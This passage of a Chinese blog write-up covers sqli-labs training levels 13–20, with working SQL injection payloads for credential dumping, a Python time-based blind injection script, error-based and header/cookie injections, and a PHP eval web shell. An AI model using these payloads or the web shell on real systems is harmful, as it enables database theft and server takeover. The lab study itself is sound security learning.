<figure class="highlight n1ql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs n1ql">1&#x27;) union <span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(*),concat((<span class="hljs-keyword">select</span> concat_ws(<span class="hljs-string">&#x27;~&#x27;</span>,username,<span class="hljs-keyword">password</span>)<span class="hljs-keyword">from</span> security.users <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-built_in">floor</span>(rand(<span class="hljs-number">14</span>)*<span class="hljs-number">2</span>))a <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a #<br></code></pre></div></td></tr></table></figure>

<p>对应结果</p>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/jhgfhj.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/jhgfhj.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>而第14关就是语句的闭合方式变为双引号，可按照同样的方式进行注入。</p>
<hr>
<h3 id="15-16"><a href="#15-16" class="headerlink" title="15~16"></a>15~16</h3><p> 这两关是post类型的盲注。有了之前get类型中盲注的经验，这两关也就不那么复杂了。</p>
<p>此时的页面是不会提供一丁点信息的，语句正确与否只会弹出一张图片来告诉我们是否登录成功，而这个信息对我们来说是没用的，所以想到利用盲注的方法来进行注入。在尝试bool型盲注无效后转为用time类型的盲注。</p>
<p> 完善了一下之前的脚本，顺利完成任务。贴一下脚本的主要代码：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs pgsql"><span class="hljs-meta">#playload:</span><br># <span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">schema_name</span>) <span class="hljs-keyword">from</span> information_schema.schemata<br># <span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">table_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;  &#x27;</span><br># <span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">column_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;  &#x27;</span><span class="hljs-keyword">and</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">&#x27;  &#x27;</span><br># <span class="hljs-keyword">select</span> group_concat(concat_ws(<span class="hljs-string">&#x27;~&#x27;</span>,<span class="hljs-keyword">password</span>,username)) <span class="hljs-keyword">from</span> <span class="hljs-keyword">security</span>.users<br>dic = <span class="hljs-string">&#x27;&#x27;&#x27;abcdefghijklmnopqrstuvwxyz,_ 0123456789()~`!@#$%^&amp;*-=+[]&#123;&#125;;:&#x27;</span>&quot;|\,&lt;.&gt;/?&#x27;&#x27;&#x27;#基于这个字典循环爆破<br>string = &#x27;&#x27;<br>url = &quot;http://<span class="hljs-number">192.168</span><span class="hljs-number">.147</span><span class="hljs-number">.181</span>/sqli-labs-master/Less<span class="hljs-number">-15</span>/&quot;<br>for i in range(1, 100)  <br>	for j in dic:<br>    	payload = &#x27;&#x27;&#x27;admin&quot;)<span class="hljs-keyword">and</span> <span class="hljs-keyword">if</span>(substr((<span class="hljs-keyword">select</span> group_concat(concat_ws(<span class="hljs-string">&#x27;~&#x27;</span>,<span class="hljs-keyword">password</span>,username)) <span class="hljs-keyword">from</span> <span class="hljs-keyword">security</span>.users),&#123;&#125;,<span class="hljs-number">1</span>)=&#123;&#125;,sleep(<span class="hljs-number">3</span>),<span class="hljs-number">1</span>)#<span class="hljs-string">&#x27;&#x27;&#x27;.format(int(i), ascii(j))</span><br><span class="hljs-string">        # 针对不同题目修改payload与data</span><br><span class="hljs-string">         data = &#123;</span><br><span class="hljs-string">                &#x27;</span>unam<span class="hljs-string">e&#x27;: payload,</span><br><span class="hljs-string">                &#x27;</span>passwd<span class="hljs-string">&#x27;: &#x27;</span>&amp;submit=Submit<span class="hljs-string">&#x27;</span><br><span class="hljs-string">         &#125;</span><br><span class="hljs-string">          # print(data)</span><br><span class="hljs-string">         response = requests.post(url, data=data)</span><br><span class="hljs-string">         sec = response.elapsed.total_seconds()</span><br><span class="hljs-string"></span><br><span class="hljs-string">         if sec &gt; 2: </span><br><span class="hljs-string">         	string += j</span><br><span class="hljs-string">            print(string)</span><br><span class="hljs-string">            break</span><br><span class="hljs-string">print(string)</span><br></code></pre></div></td></tr></table></figure>

<p>爆破的部分结果图：</p>
<p>有点奇怪为什么账号和密码用的是y来隔开，依照我用的语句应该是~隔开才对</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">payload = <span class="hljs-string">&#x27;&#x27;&#x27;admin&quot;)and if(substr((select group_concat(concat_ws(&#x27;~&#x27;,password,username)) from security.users),&#123;&#125;,1)=&#123;&#125;,sleep(3),1)#&#x27;&#x27;&#x27;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">int</span>(i), <span class="hljs-built_in">ascii</span>(j))<br></code></pre></div></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210725152947.png"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210725152947.png" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<hr>
<h3 id="17"><a href="#17" class="headerlink" title="17"></a>17</h3><p>这道题有提示说是password reset，通过尝试登录可以发现这关会检测你输入的用户名，当用户名错误的时候会显示友好的提示来鼓励你</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210910211641.png" srcset="/img/loading.gif" lazyload></p>
<p>而用户名正确时会弹出不一样的界面：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210910211808.png" srcset="/img/loading.gif" lazyload></p>
<p>它会提示你密码已更新。</p>
<p>尝试在password处构造一些基本的sql注入语句，都失败了。如图所示order by字段数都查不了。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210910213407.png" srcset="/img/loading.gif" lazyload></p>
<p>在这里我们又需要另一种方法——报错注入</p>
<p>（其实第5、6关也能用报错注入，这是在有报错语句提示的时候也许就能用上的方法）</p>
<p>报错注入可分别使用以下两种函数 ：</p>
<ul>
<li>extractvalue（）</li>
<li> updatexml（）</li>
</ul>
<p>基本格式：</p>
<figure class="highlight smali"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs smali">?id=1<span class="hljs-built_in"> and/or </span>updatexml(1,(payload),1)<br>?id=1<span class="hljs-built_in"> and/or </span>extractvalue(1,concat(0x7e,(payload),0x7e))<span class="hljs-comment">#</span><br>//仍然需要先尝试使用单双引号来先闭合语句再来构造sql注入语句<br></code></pre></div></td></tr></table></figure>

<p>在这里执行语句如下</p>
<p>(你会发现下面三种语句好像都不是固定的语法，我尝试找了下规则，还是觉得记住</p>
<p>**<code>extractvalue(1,concat(0x7e,(payload),0x7e))#</code>**这一种形式就好了)</p>
<figure class="highlight csharp"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs csharp"><span class="hljs-comment">//查询当前数据库</span><br>passwd=<span class="hljs-number">1&#x27;</span><span class="hljs-function"><span class="hljs-keyword">and</span> <span class="hljs-title">extractvalue</span>(<span class="hljs-params"><span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,(database(</span>))))#</span><br><span class="hljs-function"><span class="hljs-comment">//查询所有的数据库名</span></span><br><span class="hljs-function">passwd</span>=<span class="hljs-number">1&#x27;</span><span class="hljs-function"><span class="hljs-keyword">and</span> <span class="hljs-title">updatexml</span>(<span class="hljs-params"><span class="hljs-number">1</span>,(<span class="hljs-keyword">select</span> group_concat(schema_name</span>) <span class="hljs-keyword">from</span> information_schema.schemata),1)#</span><br><span class="hljs-function"><span class="hljs-comment">//查user下的表名</span></span><br><span class="hljs-function">passwd</span>=<span class="hljs-number">1&#x27;</span><span class="hljs-function"><span class="hljs-keyword">and</span> <span class="hljs-title">extractvalue</span>(<span class="hljs-params"><span class="hljs-number">1</span>,(<span class="hljs-keyword">select</span> group_concat(column_name</span>) <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">where</span> table_name</span>=<span class="hljs-string">&#x27;users&#x27;</span>))<span class="hljs-meta">#</span><br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/image-20210910222943565.png" srcset="/img/loading.gif" lazyload></p>
<p> <img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210910222833.png" srcset="/img/loading.gif" lazyload></p>
<p>值得注意的是，这关不让直接查user表，当sql语句为    <code> and extractvalue(1,concat(0x7e,(select group_concat(username) from security.users),0x7e))#</code>会弹出如下结果：<img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911105416.png" srcset="/img/loading.gif" lazyload></p>
<p>所以需要换个名字绕过</p>
<p><code>and extractvalue(1,concat(0x7e,(select username from (select username from users)a limit 0,1),0x7e))</code></p>
<p>另外我发现我数据库中好像所有的password都没了，像是这样。。。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911154244.png" srcset="/img/loading.gif" lazyload></p>
<hr>
<h3 id="18-20"><a href="#18-20" class="headerlink" title="18~20"></a>18~20</h3><p>通过提示并查看源码可知第18关的注入点不在username和password上了，而在数据包的User-Agent处。</p>
<p>通过尝试构造sql注入语句发现有报错信息，所以继续采取报错注入</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911152728.png" srcset="/img/loading.gif" lazyload></p>
<p><code>User-Agent: 1&#39;and extractvalue(1,concat(0x7e,(database()),0x7e)) and &#39;1&#39;=&#39;1</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911152654.png" srcset="/img/loading.gif" lazyload></p>
<p>成功查询到当前数据库名。</p>
<p>另外这里的语句末尾并不是用注释符#闭合，而是’1‘=’1来闭合。</p>
<p>剩下的步骤就是利用报错注入，不再重复。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911153419.png" srcset="/img/loading.gif" lazyload></p>
<p>而第19关就从ua变成了Referer</p>
<p><code>Referer: &#39;and extractvalue(1,concat(0x7e,(database()),0x7e))  and&#39;1&#39;=&#39;1</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911154938.png" srcset="/img/loading.gif" lazyload></p>
<p>不再赘述。</p>
<p>20关是在cooki处</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20210911155830.png" srcset="/img/loading.gif" lazyload></p>
<hr>
<h3 id="简单总结"><a href="#简单总结" class="headerlink" title="简单总结"></a>简单总结</h3><hr>
<ul>
<li><p>1~4 GET - Error base 类型，很直白的把信息都显示出来，没啥好说的。</p>
</li>
<li><p>5~6 GET -double 类型，输入的正常查询语句不再显示有用的信息，但报错语句仍有提示。用到了mysql数据库rand,group_by,count函数结合使用的特性（bug？），原理有点复杂，和前面基础类型相比，就结果而言其实就是order by后面的步骤中，</p>
<p><code>union select 1,2...</code> 变成了</p>
<p><code>union select count(*),concat( (select ..), floor(rand(14)*2))as c from 任一一个表名 group by     c</code></p>
<p>另外，group_concat拼接在语句中会失效（不知道为啥），使用limit语句作为代替来查询 more than 1 row 的数据。</p>
</li>
<li><p>7 GET -Dump into out file 类型，文件上传漏洞。使用into outfile函数，指定服务器上的绝对路径可实现上传文件，可用来上传一句话木马<code> &lt;?php @eval($_POST[&quot;密码&quot;]);?&gt;</code>，配合中国菜刀（攻击工具）达成目的。</p>
<p><em>小插曲：我就在这里写了个一句话木马（虽然在这里并不起作用），win10 的defender还是检测到了并弹出了危险警告。真是苦了defender能在我写的一堆垃圾中还找到疑似病毒的东西</em></p>
</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/1DAFD32562C47EE4EB5BDD578D1CA7F0.jpg"><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/1DAFD32562C47EE4EB5BDD578D1CA7F0.jpg" srcset="/img/loading.gif" lazyload alt="img"></a></p>
<p>不过这防火墙是真烦人，打开文件就报毒，搞得我都误删了一次，还得把相关文件夹加进白名单。</p>
<ul>
<li><p>8 GET - Blind - Boolian Based 类型 掌握一些截取字符的函数。从这开始最好就要学会使用脚本工具了。</p>
</li>
<li><p>9~10 GET - Blind - Time Based 类型 掌握sleep函数。</p>
<p>盲注是最常见的sql注入类型，所以有必要仔细掌握。盲注采取的攻击语句并没什么变化，只是多了截取字符与字典比较的过程，这种爆破的思路很适合用脚本解决。</p>
</li>
<li><p>11~12 POST-Error Based 类型 接触到post类型的注入，最大的变化是不通过url地址栏，而是通过上传数据的表单进行注入攻击了，语句也不再通过浏览器url解析，如注释符“#”直接用而不再是用“%23”。</p>
</li>
<li><p>13~14 POST-double 类型。方法同get。</p>
</li>
<li><p>15~16 POST-Blind 类型。（虽说关卡名字说是布尔注入，但我没找到语句正确与错误时返回页面的不同，可能需要抓包来看了）。同样用python脚本解决，对python的掌握程度要求并不高。</p>
</li>
<li><p>17 POST-Update类型。利用已有账户，对其修改密码处注入，注入方式为报错注入。用到了extractvalue()或updatexml()函数</p>
</li>
<li><p>18~20 POST header/cookie 类型。就是注入的位置不在明显的页面中，而在数据包内。后面这几关都是采取的报错注入的方式。</p>
</li>
</ul>
<hr>
<p>断断续续弄了这么久，终于做完了前20关…有缘再写后面的了</p>
<p>完结 : )🐣</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/%E7%BD%91%E5%AE%89/">网安</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F/">渗透</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/06/04/%E5%8E%9F%E6%9D%A5%E5%88%86%E5%BC%80%E7%9A%84%E6%97%A5%E5%AD%90%EF%BC%8C%E4%BD%A0%E6%95%B0%E7%9A%84%E8%BF%99%E4%B9%88%E6%B8%85%E6%A5%9A/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">原来分开的日子，你数的这么清楚</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/16/%E4%B8%8D%E4%B8%BA%E4%BA%94%E6%96%97%E7%B1%B3%E5%8F%96%E7%85%A7%E7%89%87/">
                        <span class="hidden-mobile">不为五斗米取照片</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "DejyuTUMjI2eFz3aDorItWV1-gzGzoHsz",
          app_key: "fuBqYYOE6Y2x4Ssxcxg7OhUW",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "monsterid",
          meta: ["nick"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: true,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
<div>
  <span id="timeDate">载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("05/14/2021 10:42:10");//此处修改你的建站时间或者网站上线时间
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🐣孵化中... for&nbsp"+dnum+"&nbspdays";  //此次自定义显示内容
      document.getElementById("times").innerHTML = hnum + "&nbsphr&nbsp" + mnum + "&nbspmin&nbsp" + snum + "&nbspsec";
  }  //此次自定义显示内容
  setInterval("createtime()",250);
  </script>
</div>
<div class="text-center py-1">   
  <div>
    <span>Copyright © 2021</span></a>
    <span>Eggswoo</span></a>    <br>
  </div>
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>














  
<script src="/js/diy/diy.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/caidai.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
